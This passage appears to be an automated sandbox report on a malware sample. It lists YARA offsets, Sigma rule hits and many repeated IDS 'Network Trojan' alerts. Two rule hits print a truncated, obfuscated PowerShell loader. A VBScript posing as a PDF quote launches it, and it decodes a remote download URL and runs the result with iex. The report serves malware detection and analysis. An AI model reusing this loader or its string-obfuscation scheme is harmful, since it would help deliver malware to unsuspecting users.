              • 0x14136:$s3: Reverse
              • 0x70fa:$s4: +=
              • 0x71bc:$s4: +=
              • 0xb3e3:$s4: +=
              • 0xd500:$s4: +=
              • 0xd7ea:$s4: +=
              • 0xd930:$s4: +=
              • 0x17e18:$s4: +=
              • 0x17e98:$s4: +=
              • 0x17f5e:$s4: +=
              • 0x17fde:$s4: +=
              • 0x181b4:$s4: +=
              • 0x18238:$s4: +=
              • 0xe129:$e4: Get-WmiObject
              • 0xe318:$e4: Get-Process
              • 0xe370:$e4: Start-Process
              • 0x16941:$e4: Get-Process

              System Summary

              barindex
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmusemesminespipQuadratlEarnneti Jdeka tclownis(Up
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Request for Proposal Quote_2414976#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Request for Proposal Quote_2414976#U00b7pdf.vbs", CommandLine|base64offset|contains: ~, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Request for Proposal Quote_2414976#U00b7pdf.vbs", ProcessId: 4320, ProcessName: wscript.exe
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Request for Proposal Quote_2414976#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Request for Proposal Quote_2414976#U00b7pdf.vbs", CommandLine|base64offset|contains: ~, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Request for Proposal Quote_2414976#U00b7pdf.vbs", ProcessId: 4320, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmusemesminespipQuadratlEarnneti Jdeka tclownis(Up
              Timestamp:04/18/24-21:15:47.546903
              SID:2024313
              Source Port:49763
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:43.577757
              SID:2021641
              Source Port:49760
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:24.990290
              SID:2025381
              Source Port:49746
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:47.546903
              SID:2024318
              Source Port:49763
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:03.069976
              SID:2021641
              Source Port:49775
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:48.869530
              SID:2025381
              Source Port:49764
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:39.649079
              SID:2021641
              Source Port:49757
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:04.601915
              SID:2025381
              Source Port:49728
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:14:55.405038
              SID:2024313
              Source Port:49720
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:14:55.405038
              SID:2024318
              Source Port:49720
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:08.492047
              SID:2025381
              Source Port:49731
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:06.993244
              SID:2024318
              Source Port:49778
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:09.740290
              SID:2021641
              Source Port:49732
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:06.993244
              SID:2024313
              Source Port:49778
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:14:51.563444
              SID:2024312
              Source Port:49717
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:14:51.563444
              SID:2024317
              Source Port:49717
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:00.483740
              SID:2024318
              Source Port:49773
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:14.853773
              SID:2025381
              Source Port:49736
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:00.483740
              SID:2024313
              Source Port:49773
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:30.148760
              SID:2021641
              Source Port:49750
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:52.727351
              SID:2021641
              Source Port:49767
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:18.646857
              SID:2021641
              Source Port:49739
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:23.725040
              SID:2024313
              Source Port:49745
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:54.038795
              SID:2024318
              Source Port:49768
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:14:52.788914
              SID:2025381
              Source Port:49718
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:03.295987
              SID:2024318
              Source Port:49727
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:54.038795
              SID:2024313
              Source Port:49768
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:03.295987
              SID:2024313
              Source Port:49727
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:23.725040
              SID:2024318
              Source Port:49745
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:16.137495
              SID:2024313
              Source Port:49737
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:14:56.706824
              SID:2024318
              Source Port:49722
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:12.336916
              SID:2021641
              Source Port:49734
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:14:58.054488
              SID:2025381
              Source Port:49723
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:11.036801
              SID:2021641
              Source Port:49780
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:14:56.706824
              SID:2024313
              Source Port:49722
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:21.167396
              SID:2024313
              Source Port:49743
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:14:54.064385
              SID:2021641
              Source Port:49719
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:16.137495
              SID:2024318
              Source Port:49737
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:21.167396
              SID:2024318
              Source Port:49743
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:01.992569
              SID:2025381
              Source Port:49726
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:57.883313
              SID:2024318
              Source Port:49771
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:35.272659
              SID:2025381
              Source Port:49754
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:55.291838
              SID:2025381
              Source Port:49769
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:28.852627
              SID:2021641
              Source Port:49749
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:56.584321
              SID:2021641
              Source Port:49770
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:37.064330
              SID:2021641
              Source Port:49755
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:26.304472
              SID:2021641
              Source Port:49747
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:46.232170
              SID:2025381
              Source Port:49762
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:04.366648
              SID:2024313
              Source Port:49776
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:13.616364
              SID:2024318
              Source Port:49735
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:04.366648
              SID:2024318
              Source Port:49776
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:07.211883
              SID:2024313
              Source Port:49730
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:13.616364
              SID:2024313
              Source Port:49735
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:07.211883
              SID:2024318
              Source Port:49730
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:50.128905
              SID:2024318
              Source Port:49765
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:57.883313
              SID:2024313
              Source Port:49771
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:31.417776
              SID:2025381
              Source Port:49751
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:27.574110
              SID:2024313
              Source Port:49748
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:50.128905
              SID:2024313
              Source Port:49765
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:27.574110
              SID:2024318
              Source Port:49748
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:05.710998
              SID:2021641
              Source Port:49777
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:19.900785
              SID:2021641
              Source Port:49742
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:43.577757
              SID:2024318
              Source Port:49760
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:38.343274
              SID:2025381
              Source Port:49756
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:31.417776
              SID:2024318
              Source Port:49751
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:43.577757
              SID:2024313
              Source Port:49760
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:55.291838
              SID:2021641
              Source Port:49769
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:52.727351
              SID:2025381
              Source Port:49767
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:14:55.405038
              SID:2021641
              Source Port:49720
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:14:58.054488
              SID:2024313
              Source Port:49723
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:00.650946
              SID:2025381
              Source Port:49725
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:12.336916
              SID:2025381
              Source Port:49734
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:06.993244
              SID:2021641
              Source Port:49778
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:09.740290
              SID:2024313
              Source Port:49732
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:14:58.054488
              SID:2024318
              Source Port:49723
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:09.740290
              SID:2024318
              Source Port:49732
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:56.584321
              SID:2024318
              Source Port:49770
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:27.574110
              SID:2025381
              Source Port:49748
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:11.056904
              SID:2024318
              Source Port:49733
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:01.755192
              SID:2024313
              Source Port:49774
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:04.366648
              SID:2025381
              Source Port:49776
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:18.646857
              SID:2024318
              Source Port:49739
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:46.232170
              SID:2021641
              Source Port:49762
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:13.616364
              SID:2025381
              Source Port:49735
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:18.646857
              SID:2024313
              Source Port:49739
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:01.755192
              SID:2024318
              Source Port:49774
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:31.417776
              SID:2024313
              Source Port:49751
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:33.969601
              SID:2025381
              Source Port:49753
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:11.056904
              SID:2024313
              Source Port:49733
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:54.038795
              SID:2021641
              Source Port:49768
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:03.295987
              SID:2021641
              Source Port:49727
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:11.036801
              SID:2024318
              Source Port:49780
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:59.169571
              SID:2025381
              Source Port:49772
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:16.137495
              SID:2021641
              Source Port:49737
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:05.927820
              SID:2025381
              Source Port:49729
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:21.167396
              SID:2021641
              Source Port:49743
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:47.546903
              SID:2025381
              Source Port:49763
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:32.674567
              SID:2021641
              Source Port:49752
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:40.987319
              SID:2024313
              Source Port:49758
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:37.064330
              SID:2024318
              Source Port:49755
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:39.649079
              SID:2025381
              Source Port:49757
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:24.990290
              SID:2021641
              Source Port:49746
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:48.869530
              SID:2024318
              Source Port:49764
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:51.436031
              SID:2025381
              Source Port:49766
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:28.852627
              SID:2024313
              Source Port:49749
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:44.926071
              SID:2024313
              Source Port:49761
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:40.987319
              SID:2024318
              Source Port:49758
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:48.869530
              SID:2024313
              Source Port:49764
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:56.584321
              SID:2024313
              Source Port:49770
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:28.852627
              SID:2024318
              Source Port:49749
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:37.064330
              SID:2024313
              Source Port:49755
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:14:52.788914
              SID:2021641
              Source Port:49718
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:14:59.337353
              SID:2021641
              Source Port:49724
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:44.926071
              SID:2024318
              Source Port:49761
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:30.148760
              SID:2025381
              Source Port:49750
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:14.853773
              SID:2024318
              Source Port:49736
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:05.710998
              SID:2024313
              Source Port:49777
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:08.287618
              SID:2025381
              Source Port:49779
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:17.411805
              SID:2025381
              Source Port:49738
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:07.211883
              SID:2021641
              Source Port:49730
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:50.128905
              SID:2021641
              Source Port:49765
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:57.883313
              SID:2021641
              Source Port:49771
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:22.462652
              SID:2025381
              Source Port:49744
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:19.900785
              SID:2024318
              Source Port:49742
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:42.247156
              SID:2021641
              Source Port:49759
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:16:05.710998
              SID:2024318
              Source Port:49777
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:14.853773
              SID:2024313
              Source Port:49736
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:19.900785
              SID:2024313
              Source Port:49742
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:35.272659
              SID:2024318
              Source Port:49754
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:37.064330
              SID:2025381
              Source Port:49755
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:35.272659
              SID:2024313
              Source Port:49754
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:55.291838
              SID:2024313
              Source Port:49769
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:59.169571
              SID:2024313
              Source Port:49772
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:55.291838
              SID:2024318
              Source Port:49769
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/18/24-21:15:27.574110
              SID:2021641
